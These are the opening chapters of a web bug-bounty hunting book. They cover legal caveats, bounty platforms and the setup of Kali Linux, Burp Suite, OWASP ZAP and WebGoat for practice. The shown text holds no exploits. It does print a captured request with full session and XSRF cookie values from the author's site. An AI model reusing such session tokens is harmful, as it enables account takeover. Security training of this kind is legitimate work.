Bug Bounty Hunting for Web Security

Find and Exploit Vulnerabilities in Web sites and Applications

Sanjib Sinha



Bug Bounty Hunting for Web Security

Find and Exploit Vulnerabilities in Web sites and Applications

Sanjib Sinha

Apress[®]

Bug Bounty Hunting for Web Security

Sanjib Sinha Howrah, West Bengal, India

ISBN-13 (pbk): 978-1-4842-5390-8 https://doi.org/10.1007/978-1-4842-5391-5

ISBN-13 (electronic): 978-1-4842-5391-5

Copyright © 2019 by Sanjib Sinha

This work is subject to copyright. All rights are reserved by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed.

Trademarked names, logos, and images may appear in this book. Rather than use a trademark symbol with every occurrence of a trademarked name, logo, or image we use the names, logos, and images only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark.

The use in this publication of trade names, trademarks, service marks, and similar terms, even if they are not identified as such, is not to be taken as an expression of opinion as to whether or not they are subject to proprietary rights.

While the advice and information in this book are believed to be true and accurate at the date of publication, neither the authors nor the editors nor the publisher can accept any legal responsibility for any errors or omissions that may be made. The publisher makes no warranty, express or implied, with respect to the material contained herein.

Managing Director, Apress Media LLC: Welmoed Spahr Acquisitions Editor: Nikhil Karkal Development Editor: Matthew Moodie Coordinating Editor: Divya Modi

Cover designed by eStudioCalamar

Cover image designed by Pixabay

Distributed to the book trade worldwide by Springer Science+Business Media New York, 233 Spring Street, 6th Floor, New York, NY 10013. Phone 1-800-SPRINGER, fax (201) 348-4505, e-mail orders-ny@springer-sbm.com, or visit www.springeronline.com. Apress Media, LLC is a California LLC and the sole member (owner) is Springer Science + Business Media Finance Inc (SSBM Finance Inc). SSBM Finance Inc is a **Delaware** corporation.

For information on translations, please e-mail rights@apress.com, or visit www.apress.com/ rights-permissions.

Apress titles may be purchased in bulk for academic, corporate, or promotional use. eBook versions and licenses are also available for most titles. For more information, reference our Print and eBook Bulk Sales web page at www.apress.com/bulk-sales.

Any source code or other supplementary material referenced by the author in this book is available to readers on GitHub via the book's product page, located at www.apress.com/978-1-4842-5390-8. For more detailed information, please visit www.apress.com/source-code.

Printed on acid-free paper

To Kartick Paul, Ex-System Manager, AAJKAAL, Software Developer and enthusiast who has made my dream come true.

It is an essentially humble effort on my behalf to show that I am overwhelmed with gratitude for your help.

Table of Contents

About the Author	ix
About the Technical Reviewer	xi
Acknowledgments	xiii
Introduction	xv
Chapter 1: Introduction to Hunting Bugs	1
Bug Bounty Platforms	3
Introducing Burp Suite, OWASP ZAP, and WebGoat	5
Chapter 2: Setting Up Your Environment	7
Why We Need a Virtual Environment	8
Introduction to Kali Linux—the Hacker's Operating System	10
Tools in Kali Linux	16
Burp Suite and OWASP ZAP	18
How to Start OWASP ZAP	21
Hack the WebGoat	23
Adding a Proxy to a Browser	26
Introducing Other Tools	31
Chapter 3: How to Inject Request Forgery	37
What Is Cross-Site Request Forgery?	37
Mission Critical Injection of CSRF	39
Other CSRF Attacks	45
How to Discover CSRF on Any Application	46

TABLE OF CONTENTS

Chapter 4: How to Exploit Through Cross-Site Scripting (XSS)	57
What Is XSS?	58
Discovering XSS Vulnerabilities	60
Exploiting XSS Vulnerabilities	71
Chapter 5: Header Injection and URL Redirection	79
Introducing Header Injection and URL Redirection	79
Cross-Site Scripting Through Header Injection	82
Discovering Header Injection and URL Redirection Vulnerabilities	88
Chapter 6: Malicious Files	97
Uploading Malicious Files to Own a System	98
Owning a Web Site	
Traditional Defacement	112
Chapter 7: Poisoning Sender Policy Framework	115
Testing SPF Records	
Examining the Vulnerabilities of SPF	
Chapter 8: Injecting Unintended XML	123
What Is XML?	124
What Is a DTD?	
What Is XML External Entity Injection?	
Performing XML Injection in a Virtual Lab	
Fetching System Configuration Files	134
Chapter 9: Finding Command Injection Vulnerabilities	147
Discovering OS Command Injection	148
Injecting and Exploiting Malicious Commands	153
Setting the Payload Position in Intruder	159

TABLE OF CONTENTS

Chapter 10: Finding HTML and SQL Injection Vulnerabilities	167
What Is HTML Injection?	167
Finding HTML Injection Vulnerabilities	168
Exploiting HTML Injection	176
Preventing HTML Injection	181
What Is SQL Injection?	182
Bypassing Authentication by SQL Injection	183
Discovering the Database	190
Appendix: Further Reading and What's Next	197
Tools that Can Be Used Alongside Burp Suite	197
How Source Code Disclosure Helps Information Gathering	216
What Could Be the Next Challenges to Hunting Bugs?	218
Index	221

About the Author



Sanjib Sinha is an author, and tech writer. Being a certified .NET Windows and Web developer, he has specialized in Python security programming, Linux, and many programming languages that include C#, PHP, Python, Dart, Java, and JavaScript. Sanjib has also won Microsoft's Community Contributor Award in 2011, and he has written "Beginning Ethical Hacking with Python," "Beginning

Ethical Hacking with Kali Linux," and "Beginning Laravel 5.8 (First and Second Edition)" for Apress.

About the Technical Reviewer



Prajal Kulkarni is a security researcher currently working with Flipkart. He has been an active member of the Null security community for the past 3 Years. His areas of interest include web, mobile, and system security. He writes a security blog at www. prajalkulkarni.com and he is also the lead contributor at project Code Vigilant (https:// codevigilant.com/). Code-Vigilant has

disclosed 200+ vulnerabilities in various WordPress plugins and themes. In the past, he has disclosed several vulnerabilities in the core components of GLPI, BugGenie, ownCloud, etc. Prajal has also reported many security vulnerabilities to companies like Adobe, Twitter, Facebook, Google, and Mozilla. He has spoken at multiple security conferences and provided training at NullCon2015, NullCon2016, NullCon2018, Confidence 2014, Grace Hopper 2014, etc.

Acknowledgments

I wish to record my gratitude to my wife, Kaberi, for her unstinting support and encouragement in the preparation of this book.

I am extremely grateful to Mr. Matthew Moodie, Lead Development Editor, for his numerous valuable suggestions, complementary opinions and thorough thumbing; Nikhil Karkal, Editor and Divya Modi, Coordinating Editor, and the whole Apress team for their persistent support and help.

In the preparation of this book, I have had to consult numerous open source documentation and textbooks on a variety of subjects related to web security research; I thank the countless authors and writers who have written them.

Introduction

In this book you will learn about implementing an offensive approach toward security bug hunting by finding vulnerabilities in web applications. You will also take a look at the type of tools necessary to build up this particular approach. You will learn how to use hacking tools like Burp Suite, OWASP ZAP, SQIMAP, and DirBuster and you will also get an introduction to Kali Linux. After taking a close look at the types of tools at your disposal, you will set up your virtual lab.

You will then learn how Request Forgery Injection works on web pages and applications in a mission critical setup. Moving on to the most challenging task for any web application developer, or a Penetration tester, you will take a look at how Cross-site Scripting works and learn effective ways to exploit it.

You will then learn how header injection and URL redirection work, along with key tips to find vulnerabilities in them. Keeping in mind how attackers can compromise your web site, you will learn to work with malicious files and automate your approach to defend against these attacks. You will be provided with tips to find and exploit vulnerabilities in the Sender Policy Framework (SPF). Following this, you will get to know how Unintended XML Injection and Command Injection work to keep attackers at bay. In conclusion, you will take a look at different attack vectors used to exploit HTML and SQL injection. Overall, this book will guide you to become a better Penetration tester, and at the same time it will teach you how to earn bounty by hunting bugs in web applications.

INTRODUCTION

Essentially, you will learn how to

- Implement an offensive approach to Bug Hunting
- Create and manage Request Forgery on web pages
- Poison Sender Policy Framework and exploit it
- Defend against Cross Site Scripting (XSS) attacks
- Inject Header and test URL redirection
- Work with malicious files and Command Injection
- Resist strongly unintended XML attacks and HTML, SQL injection

• Earn Bounty by hunting bugs in web applications In addition:

- As a beginner, you will learn penetration testing from scratch.
- You will gain a complete knowledge of web security.
- Learning to find vulnerabilities in web applications will help you become a better Penetration tester.
- You will get acquainted with two of the most powerful security tools of penetration testing: Burp Suite and OWASP ZAP.

CHAPTER 1

Introduction to Hunting Bugs

Why do we learn to hunt bugs? It is difficult to answer this question in one sentence. There are several reasons, and reasons vary from person to person.

The first and foremost reason is we want to be better security professionals or researchers.

When a security professional is able to hunt security bugs in any web application, it gains them recognition; and because they are helping the whole community to remain safe and secure, it earns them respect as well. At the same time, the successful bug hunter usually gets a bounty for their effort. Almost every big web application, including Google, Facebook, and Twitter, has its own bug hunting and bounty program. So learning to hunt bugs may also help you to earn some extra money. There are many security experts and researchers who make this their profession and earn regular money by hunting bugs.

Reading this book will give you insight into implementing an offensive approach to hunting bugs in web applications. However, that knowledge should never be used for malpractice. You are learning these "attacking techniques" for defending web applications as a penetration

CHAPTER 1 INTRODUCTION TO HUNTING BUGS

tester (pen tester) or an ethical hacker. As a security professional, you are supposed to point out those bugs to your client so that they can rectify the vulnerabilities and thwart any malicious attack to their application.

Therefore before moving any further, we should keep this important caveat in mind: without having permission from the owners, you **may not** and **should not** attack a web application. With permissions, yes, you may move forward to hunt bugs and make a detailed report of what can be done to defend against them.

There are also several good platforms (we will talk about them in a minute) that allow you to work for them, and as a beginner, you'd better get registered with those platforms and hunt bugs for them. The greatest advantage is you get immense help from fellow senior security professionals. While you earn you will learn, and it is secured. You are hunting bugs or finding exploits and vulnerabilities with the owner's permission.

As a beginner, you should not try these techniques on any live web application on your own. In many countries, attacking the system without the owner's permission is against the law. It may land you in jail and end your career as a security professional.

Therefore, it is better to be registered with the bug bounty platforms and play the game according to the rules. We urge you to use the information contained in this book for lawful purposes; if you use it for unlawful purposes and end up in trouble, the author and the publisher will not be responsible.

In my opinion, if you are only interested in the bounty, you will not learn anything and finally, you are not eligible to earn money and respect. Finding exploits and vulnerabilities demands a very steep learning curve. You need to know many things, including web application architecture, how the Web evolves, what are the core defense mechanisms, the key technology behind the Web (e.g., HTTP protocol, encoding schemes), etc. You must be aware of the mapping of the web application and different types of attacks that can take place. In this book, we will learn these and more together.

Now we can try to summarize the bug bounty program in one sentence.

Many web applications and software developers offer a bounty to hunt bugs; it also earns recognition and respect, depending on how well you are able to find the exploits and vulnerabilities.

If you prefer a shorter definition than the previous one, here it is:

An ethical hacker who is paid to find vulnerabilities in software and web sites is called a bug bounty hunter.

Bug Bounty Platforms

As I have said, as a beginner one should try the bug bounty platforms first and stick around for a long time to learn the tricks and techniques. In reality, not only beginners but many experienced security professionals are attached to such platforms and regularly hack for them.

There are many advantages. First, we should keep lawfulness in our minds. Through these platforms, you know what you may do and what you may not do. It's very important. Another essential aspect is you can constantly keep in touch with the security community, getting feedback and learning new things.

Here is an incomplete list of bug bounty platforms. Many good platforms will definitely come out in the future.

Hackerone www.hackerone.com/ Bugcrowd www.bugcrowd.com/ CHAPTER 1 INTRODUCTION TO HUNTING BUGS BountyFactory https://bountyfactory.io Synack www.synack.com/ Hackenproof https://hackenproof.com/ Zerocopter https://zerocopter.com/ Japan bug bounty program https://bugbounty.jp/ Cobalt https://cobalt.io/

Bug bounty programs list

AntiHack

www.bugcrowd.com/bug-bounty-list/

www.antihack.me/ However, before registering to any of these previously mentioned bug bounty platforms, you should understand a few things first. You need to know how to use a virtual machine and the hacker's operating system Kali Linux. You must learn to operate tools like Burp Suite, OWASP ZAP, WebGoat, and a few others. You need to sharpen your skill in your virtual lab. There are a few web applications that allow hacking them, or they are made intentionally vulnerable so that beginners may try their newly adopted hacking skill.

We will discuss them in the coming sections.

Introducing Burp Suite, OWASP ZAP, and WebGoat

To start with tools like Burp Suite, OWASP ZAP, and WebGoat, you need to install Kali Linux in your virtual box. We will do that for one reason: Kali Linux comes up with all these tools by default. Therefore you don't have to install them separately. I strongly recommend using the virtual machine and Kali Linux; do not use these hacking tools in your own system, be it Windows, Linux, or Mac. They either can break your system or do not work properly.

We will talk about the Kali Linux installation process in great detail in the next chapter. After that, we will learn to operate three essential tools: Burp Suite, OWASP ZAP, and WebGoat. As we progress, we will see that more tools are needed. We will learn those tools also when the situation demands.

CHAPTER 2

Setting Up Your Environment

A virtual environment, or virtualization, is not mandatory for the experienced ethical hacker. As an experienced ethical hacker, you can run Kali Linux as your main system and perform the hacking using mainly a terminal with the help of a programming language such as Python, or you can use selected tools like Metasploit. However, for beginners, virtualization is compulsory.

Let me explain very briefly why it is important. Hacking can change the system completely. If you don't understand the state of the system well, you might change the state of your main system inadvertently. As a beginner, you cannot take that risk; therefore, always practice using a virtual machine. The easiest of them is VirtualBox, so I have chosen it to show you all types of bug hunting.

As an aspiring ethical hacker and penetration tester, you should become capable of building virtual and physical labs to use for practice, as this lets you install as many operating systems as necessary. Using virtual machines, you can safely break any system and change the state in your VirtualBox. It would not affect the main system.

Why We Need a Virtual Environment

Virtualization is important for any type of penetration testing. You are going to learn how to find security vulnerabilities in any web application, and that needs a lot of practice before you actually approach a client to do the same on their live system. So we need a simulated environment first, a network security lab where we can practice, to learn and understand every trick of hunting bugs so that we can implement them on the live applications later as security professionals.

There are also other important considerations, like, since virtualization provides you a simulated environment, your main system is not touched. If you break your operating system by mistake while experimenting with any hacking-related tools, it happens inside your virtual system. You can reinstall the damaged operating system again. Another important aspect is that we have to stay within the law–always. We must practice our hackingrelated tools in a legal way on our own systems.

You can also safely browse any web sites in a virtual environment. If some malicious code enters into your simulated environment, let it stay; it won't touch your main system. I simply encourage you to do every type of testing. It is a virtual machine. So, go ahead; test everything that comes to mind.

During my long information security research career, I have tested many hypervisors. However, keeping in mind that you may run your virtualization on any operating system in a simple way without facing any problem, I strongly recommend using VirtualBox. Irrespective of any operating system, VirtualBox is the best security lab solution for beginners. We will discuss the advantages in a minute.

Just to let you know, there are several other hypervisors. Security professionals use some of them; however, most of them are targeted for specific operating systems. KVM is good for Linux. For Windows, VMware player is a good solution; Windows Virtual PC is also good, but you cannot run Linux distributions inside it. For macOS, both VMware and Virtual PC are good options including "QEMU" and "Parallels." VirtualBox can run on any operating system.

Installing VirtualBox is very simple. Whatever your operating system is, all it requires is a few clicks or typing a few commands. If you are using Windows, go to the Oracle VirtualBox page and download the latest version available. It'll simply guide you to the virtualization.

Note For VirtualBox, you need to have an ISO image to install any operating system.

I'll go through the Ubuntu Linux install in detail but will touch on other Linux distributions first. In the VirtualBox official download page for all Linux distributions, you first download the required packages and then install them according to the nature of your OS. For Red Hat, Fedora, or any Linux distribution belonging to that category, you will notice that the last extension is .rpm. In that case, you can move to the VirtualBox folder and issue commands like

```
rpm -i
```

or

```
yum install
```

There are other techniques to install VirtualBox on any Linux system. You can use your Ubuntu terminal and try the following commands separately.

//code 2.2

```
sudo apt-get install virtualbox
sudo apt install virtualbox-ext-pack
```

```
sudo apt install virtualbox virtualbox-ext-pack
sudo apt-get update
sudo add-apt-repository "deb http://download.virtualbox.org/
virtualbox/debian <ubuntu-release> contrib"
sudo apt-get install virtual-box-6.0
sudo apt-get install dkms
sudo apt install dkms build-essential module-assistant
```

If you don't want to go through typing, there are simple methods to install VirtualBox. And the good news is that it's graphical user interface based. That is the reason I'm encouraging absolute beginners to run an Ubuntu Linux distribution as their default OS. You can install VirtualBox from the software center directly without opening up the terminal or issuing any command. Ubuntu Software Center has many categories. One of them shows the installed software.

Introduction to Kali Linux—the Hacker's Operating System

Once the VirtualBox has been installed on your machine, you need not worry about installing several operating systems on it.

First, we need to install Kali Linux on our VirtualBox. Go to the official Kali Linux web site and download the ISO image of the latest stable version. Kali Linux is a much bigger Linux distribution than other Linux distributions.

The latest ISO image is more than 3 GB now, as of the middle of 2019. After the installation is over, it takes around 8 GB in your allocated virtual hard disk. Kali is by default not for general users. It contains a lot of hacking tools meant for various purposes, and because of that, it is much

heavier as far as size is concerned. For the same reason, it is also known as the hacker's operating system. You get plenty of hacking tools with Kali Linux, and you need not install them separately. In addition, it is the most popular among ethical hackers.

Many more secured Linux distributions are available:

- BlackArch Linux is one of them. It has a huge range of pen testing and hacking tools and is very large. Probably it is the largest among the others. It is over 7 GB in size because it has more than 1,900 hacking-related tools. You can run BlackArch live from a USB stick or DVD, or it can be installed on a computer or virtual machine.
- Qubes OS is another secure operating system but it is for advanced users only. In this operating system suspected applications are forced to be quarantined. It also uses sandboxes to protect the main system. Qubes OS actually runs a number of virtual machines inside, keeping the main system secure. It compartmentalizes the whole system into many categories such as "personal," "work," "Internet," and so on; it has reasons to do that. If someone accidentally downloads malware, the main system won't be affected.
- ImprediaOS is another good example. It uses the anonymous I2P network so that you can keep your anonymity all the time. It is believed to be faster than Tor, but you cannot access regular web sites easily. It is based on Fedora Linux and can run either in live mode or be installed onto the hard drive. It routes all your network traffic through the I2P networking system.

This is known as "garlic routing," whereas Tor uses "onion routing." Garlic routing is believed to be safer than onion routing. So you can visit only a special type of web sites called "eepsites" that end with ".i2p" extensions. It also has anonymous emails and BitTorrent client services. Visiting eepsites is always safer and it usually evades the surveillance radar that can track Tor.

- "Tails" is another good example of a secure Linux distribution. It keeps your anonymity intact through the Tor network, although it is debatable whether Tor can keep you absolutely anonymous or not. The main feature of Tails is that you can run it from a DVD in live mode so that it loads entirely on your system and leaves no trace of its activities.
- Another good example of a secure Linux distribution is "Whonix." You can use the power of virtual machines to stay safe online, which is achievable as the route of the whole connection is via the anonymous Tor networking system. In Whonix, several privacy-related applications are installed by default. It is advisable to use it in your VirtualBox to get the best result.

You can download any of them and try to run it on your VirtualBox. However, at present our main goal is simple enough. We'll install Kali first. Next, we will check whether the tools required for finding vulnerabilities in the web applications are updated or not. If not, then we will update them accordingly. I assume you have downloaded the latest Kali ISO image. You can either store it on your local hard drive or burn it on a DVD. Now open up your VirtualBox and click "New." It will automatically open up a new window that will ask you what type of operating system you are going to install (Figure 2-1).



Figure 2-1. A new window pops up in the VirtualBox.

Look at the top left panel of the image; you see on the VirtualBox I have already installed Kali Linux, Metasploiltable 2, and MSEdge Windows 10. This Windows version can be downloaded for free for testing purposes and it remains available for 30 days.

The whole procedure is very explicit in itself. It will guide you to what to do next. Now it is time to enter in the opened-up window or UI of VirtualBox the name of the operating system you are about to install. Next, select the type–whether it is Linux or Windows, etc.–and the version. In the

long list of versions section, you won't find the name of Kali, but basically it is Debian. So go ahead and select the 32 bit or 64 bit Debian or Ubuntu according to your system architecture. Click Next, and it will ask for the memory usage.

You can allocate the memory size as per your machine capacity. A minimum of 3 GB for virtualized Kali Linux is necessary. It is better if you can allocate more (Figure 2-2). In the next step, it will ask for storage capacity and a few other important details. For your main system, minimum 8 GB is compulsory.



Figure 2-2. Allocating the memory size for Kali

Next, we will go to the Storage section and select the ISO image of Kali Linux that we have already downloaded (Figure 2-3).



Figure 2-3. Selecting the ISO image of Kali Linux

The most important part of this installation process is you need to keep your Internet connection running so that Kali Linux will adjust its prerequisites accordingly.

Before the installation process begins, you'll notice there are many choices given. The seasoned ethical hackers will opt for the top, nongraphical, one.

However, as a beginner, you should choose the graphical one that will guide you to the installation process (Figure 2-4).

Select a language	
Choose the language t default language for tl Language:	be used for the installation process. The selected language will also be the a installed system.
chinese (Simplinea)	- \\X(@\Ph)
Chinese (Traditional)	- 中文(繁體)
Croatian	- Hrvatski
Czech	- Čeština
Danish	- Dansk
Dutch	- Nederlands
Dzongkha	- Km
English	- English
Esperanto	- Esperanto
Estonian	- Eesti
Finnish	- Suomi
French	- Français
Galician	- Galego
Georgian	- ქართული
Gorman	- Deutsch

Figure 2-4. Installing Kali Linux followed by graphical user assistance

Usually, when an operating system is installed on a virtual machine, it is displayed in a small size window and it stays like that. This is because VirtualBox architecture is not hardware based like original operating systems. It is software-based virtualization. You cannot alter the window size later. For the new Kali version, you need not worry about that; it will be installed full screen.

Tools in Kali Linux

There are hundreds of hacking tools that are available in Kali Linux. For finding vulnerabilities and hunting bugs in web applications, we mainly need two tools: Burp Suite and OWASP ZAP. Besides them, we may need other tools such as nmap, wpscan, nikto, httrack, sqlmap, DirBuster, etc. As we need them, we will learn them. Therefore, here I am not going to give separate introductions for each tool.

We must get the latest Burp Suite Community edition in our VirtualBox Kali Linux, because the Burp edition, which comes with Kali, may not have the latest Java packages in it. It is always recommended that you go to the Burp Suite Community edition download page and download the burpsuite_community_linux_v1_7_36.sh file. Normally it is downloaded in the Download directory. You need to make the file executable, so open your terminal and type this command:

//code 2.3

```
root@kali:~# cd Downloads/
root@kali:~/Downloads# ls
burpsuite_community_linux_v1_7_36.sh cacert.der webgoat-
server-8.0.0.M25.jar
root@kali:~/Downloads# sudo chmod +x burpsuite_community_linux_
v1_7_36.sh
root@kali:~/Downloads# ls
burpsuite_community_linux_v1_7_36.sh cacert.der webgoat-
server-8.0.0.M25.jar
root@kali:~/Downloads# ./burpsuite_community_linux_v1_7_36.sh
Unpacking JRE ...
Starting Installer ...
```

The next steps are quite easy and simple. Just accept the license and click Next, and you will have the Burp Suite Community edition with the latest Java (Figure 2-5).



Figure 2-5. Installing Burp Suite Community edition in your VirtualBox Kali Linux

Next, we will just check whether our newly installed Burp Suite Community edition is properly working or not.

Burp Suite and OWASP ZAP

Many ethical hackers and security professionals opine that finding vulnerabilities in any web application has been made easy with the help of the Burp Suite tool. So their advice is to buy a Burp Suite professional license and that will do all your work.

This idea is absolutely wrong. Never fall into the trap of the vague idea: that one tool will solve your all problems. It never happens in the information security industry. You need to learn constantly. This process is evolving.

Besides Burp Suite, you may need plenty of other tools that we will talk about in the next section. As I have said, finding vulnerabilities in any web application is not a piece of cake; you need to learn many things, you need to sharpen your skill in your virtual lab with the help of Kali Linux first, and it takes some time. Do not expect that with the help of one single tool you will be able to find all the exploits and vulnerabilities in a web application and earn a lot of bounty.

You get the Burp Suite Community edition for free with Kali Linux. That is all you need in the beginning, but even after that when you become a security professional, you will find it works fine. I have been doing bug hunting and penetration testing for a long time and I still do not have to use any professional tool. Yes, the professionally licensed tools work faster than the community editions, but that can be compensated for with the help of other open source tools if you learn the tricks and understand your jobs properly.

The best alternative to the Burp Suite is OWASP ZAP. It is completely free and it has become an industry standard. Many security professionals, including me, use this tool besides Burp Suite. In some cases, OWASP ZAP works better than Burp. So, in the very beginning you need not worry about buying the professional Burp Suite. We will show and practice our skill with the community edition of Burp Suite when needed.

Now, what is Burp Suite and how will we start it? There are many web penetration testing frameworks that help us identify vulnerabilities in web applications. Burp Suite is one of them. It is Java based and has many features that can verify the attack vectors that are affecting web applications.

In the Kali Linux toolbox on the left side, the fifth icon belongs to Burp Suite. Clicking it will open the Burp Suite Community edition (Figure 2-6).

Applications -	Places 🕶	🚺 burp-StartBurp 🔫	Wed 18	8:47		1 # / 0 -
S	-		Burp Suite Communit	ty Edition v1.7.36	000	
	0	Welcome to Burp Suite Community Edition. Note: Disk-based projects are only supported	Use the options below to create or d on Burp Suite Professional.	open a project.		
5		Temporary project				
•		New project on disk Fill Name	•		Choose file	
		Open existing project	Name	File		
6						
8		F.	e Pause Spider and Scanner		Choose file	
					Cancel	

Figure 2-6. Opening Burp Suite in Kali Linux

To analyze web vulnerabilities properly using Burp Suite, we need to configure our web browser (we will show that in the "Adding a Proxy to a Browser" section); but why do we need to do that? Here lies the main concept of Burp Suite. The Burp Suite works as an interception proxy. We configure our Firefox web browser in a way so that while browsing the target application we can route traffic through the Burp Suite proxy server. In the coming chapters you will find plenty of examples.

Burp Suite captures all the traffic from the targeted web application so we can analyze them later. As a penetration tester, you can manipulate this process on your own and analyze the potential risks. The same thing can be done with the help of OWASP ZAP.

Since Burp Suite is Java based, it always wants the latest Java version from the operating system. The latest Kali Linux at the time of writing this book had Java 11, and Burp will ask for Java 12 that is currently running. However, it does not affect performance.

When fully opened up, the Burp Suite looks like Figure 2-7.



Figure 2-7. Burp Suite with all its features

How to Start OWASP ZAP

Next, we will see how to open and start OWASP ZAP. By this time you have learned that OWASP ZAP does the same thing that Burp does. Go to the top left corner of Kali Linux and click the Applications tab. There you get the Web Application Analysis link that lists all tools including Burp Suite, OWASP ZAP, etc. (Figure 2-8).



Figure 2-8. Finding the OWASP ZAP tool

Click on the OWASP ZAP link and it will open up; accept the agreement and it will start working (Figure 2-9).



Figure 2-9. The OWASP ZAP tool has opened up for attacking any web application.

So far we have seen how we can open and start two main Web Application Analysis tools. We have not started to operate yet.

Hack the WebGoat

WebGoat was created as a deliberately insecure application that allows you to hack it using Burp Suite or OWASP ZAP until you are satisfied with the results. As a student of information security analysis, you need something where you can test vulnerabilities that are commonly found in web applications. WebGoat is ideal for this testing purpose.

Just open up your Firefox browser in your VirtualBox Kali Linux and type WebGoat GitHub; it will open up the WebGoat repository in GitHub (Figure 2-10).



Figure 2-10. Downloading the "webgoat-server-8.0.0.M25.jar" file from Github

After downloading the file, open up your terminal in Kali Linux. Since it has been downloaded in the Download directory, you need to change the directory and issue this command:

```
//code 1.1
root@kali:~# cd Downloads/
root@kali:~/Downloads# ls
webgoat-server-8.0.0.M25.jar
root@kali:~/Downloads# java -jar webgoat-server-8.0.0.M25.jar
18:58:02.756 [main] INFO org.owasp.webgoat.StartWebGoat -
Starting WebGoat with args: {}
```

It will give you a long output; I have cut short the lines of code for brevity. Just wait for a few minutes until the output says that the server has been started (Figure 2-11).



Figure 2-11. WebGoat server has been started by the command.

The WebGoat server uses the 8080 port on localhost. Therefore, we can now open the Firefox browser and type http://localhost.8080/ WebGoat and it will open up the intentionally vulnerable web application of WebGoat (Figure 2-12).
Applications - Places -	🔮 Firefox ESR 👻		Wed 19	:03						1	11	1	40 C) +
Releases - WebGoat/Wel X	Login Page X	+	Login Page - Mo	zilla Firefox								(• •	0
€ → C @ O	localhost:8080/WebGoat/login				¥		-	0 1	(.)		Ø		2	Ξ
🌣 Most Visited 🥆 Kali Linux '	🔨 Kali Training 🌂 Kali Tools 🕚	Kali Docs	Kali Forums	NetHunter	Offensi	ve Securi	ity .	Exploit	-DB	GHDB		ISFu		>>
WEBGOAT	Username	-												
	Password													
	Password Sign in Register new user													

Figure 2-12. The WebGoat web application has been launched on the Firefox browser.

Adding a Proxy to a Browser

For the Burp Suite and OWASP ZAP, we need to add another port to our Firefox browser. While searching the Web in a normal circumstance, the browser does not use any proxy. But now we need a proxy so that all traffic should pass through either Burp Suite or OWASP ZAP. The great advantage of OWASP ZAP is that we do not have to adjust our proxy and port in the browser. It automatically adjusts the proxy port and captures the data going through it.

However, for Burp Suite we are going to change it from no proxy to manual proxy configuration.

The process is very simple. Go to "Preferences ➤ Privacy and Security" in your Firefox browser of Kali Linux and search for "Network ➤ Settings"; there you can just change it from "No proxy" to "Manual proxy configuration" like Figure 2-13.



Figure 2-13. From "No proxy" to "Manual proxy configuration" in the Firefox browser

Since WebGoat takes the 8080 port, we have chosen another port 9500. Henceforth, while using Burp or OWASP, our traffic will flow through that port.

Next, we can add this new proxy listener to our Burp Suite. Open Burp again and from the Proxy tab go to Options and bind the port to 9500 like Figure 2-14.

Applications •	 Places 	👻 🚺 burj	p-StartBurp -		Wed 19:23			1	.W	/ =0	¢
in Na sup	Intruder Repe	ater Window H	elp	Burp Suite Commur	hity Edition v1.7.36 - Tempora	ry Project					
S	rget Proxy 1 ercept HTTP h	Spider Scanne istory WebSo	rr Intruder Repeater Se ckets history Options	equencer Decoder Con	nparer Extender Project options	User options Alerts				_	
	Proxy Liste Burp Proxy use Add Edit Remove Each installatio of Burp.	Anners Is listeners to re Aunning I	Binding Request handling These sattings control Bind to port: 555 Bind to address: 0 0 0 1 0 1 0 1	Add Certificate I how Burp binds the proxy 5 o oopback only U interfaces ipecific address: 10.0.2.15	s a new proxy listener utener.		0	ther tools or anothe	r installati	*	
	Intercept C Use these setti Intercept n Add Edit Remove Up	Ilent Reque	Operator Match type File extension P Repart Dr HTTP method URL	Relationship Dees not match Cortains parameters Dees not match Is in target scope	Candilian (*g/5]*pg5[*pg5[*cs5]*s5]* (get[post)	ок (соб)	Cancel			_	

Figure 2-14. Binding the Port to 9500 in Burp Suite

Now browse https://sanjib.site. Since I am the owner of this web application, I can turn the interceptor on in Burp and we can see that the traffic is passing through the Burp Suite (Figure 2-15).



Figure 2-15. The traffic of *https://sanjib.site* is passing through the Burp proxy.

Now I am going to test my web application (https://sanjib.site) using Burp Suite and want to see that everything falls in the proper place. This web application has been running on Laravel; and in a separate directory, it uses Wordpress.

The output looks like Figure 2-16.



Figure 2-16. The Burp Suite captures the traffic of web application https://sanjib.site.

We get all the directory listings and many more that we can analyze later. The output is like this:

//code 1.2

```
GET /computer-science-tutor-in-kolkata/ HTTP/1.1
Host: sanjib.site
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://sanjib.site/
Cookie: XSRF-TOKEN=eyJpdiI6Ik1LSG1sc2c2TElQM3JnbOdqQjhcL2V3PTO
iLCJ2YWx1ZSI6IktJbVZBUFdzV2QrMnFvXC9ZWE1mcXVLcmVsWUw4OHpPcmZlc
HNDbFRDRkE1dXJ1NVZoRkhGeVJ5MFdGZWZcL3dsOSIsIm1hYyI6IjQyNDBiYTk4
```

```
YzZmODk2NWNlYjE5Y2ZiNDUxMjcwZDAwZGY5MTQ2NzM5NTI5MjZlMjVjNDM1
MWRmMzU2NWJiNzcifQ%3D%3D; laravel_session=eyJpdiI6IlhTcXRsNXUr
V2RnQnRBZDRYdjZ6MVE9PSIsInZhbHVlIjoiVFBrdUs3ekNKSWlBWGtGTO
10NGc5NDBaa2hQQUZCT21RWHJrbEhtZkRoYWlIdHlXWEdWUVVCYjBIajh
PYTYrTiIsIm1hYyI6Ijg2YzcwNDRjMDExNmQ4Y2U4NTEwZDg1N2VlZGExNmUy
MTdiOTBiOTUwZGIzZTU2MDQ1NGMyMDRmNDFlMzlmZDAifQ%3D%3D
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

We can do many more things using this data; moreover, we can analyze the subdomains and try to find if there are any vulnerabilities left in the application. We will cover those topics in the coming chapters. Before that, in the next section, we will have a quick look at the other tools that we will need in the coming chapters.

Introducing Other Tools

There are several tools available in Kali Linux. Before discussing a few essential tools, I think it is important for you to learn where to practice your hacking skills.

We have discussed WebGoat already, although we have not seen how we can use it. We will see it later. Moreover, I encourage you to find and read the documentation of other intentionally vulnerable web applications as well. There are others that give you simulated environments to test your skills. Here is an incomplete list, because in future many good applications may come out.

BWAPP

Rootme

OWASP Juicy Shop

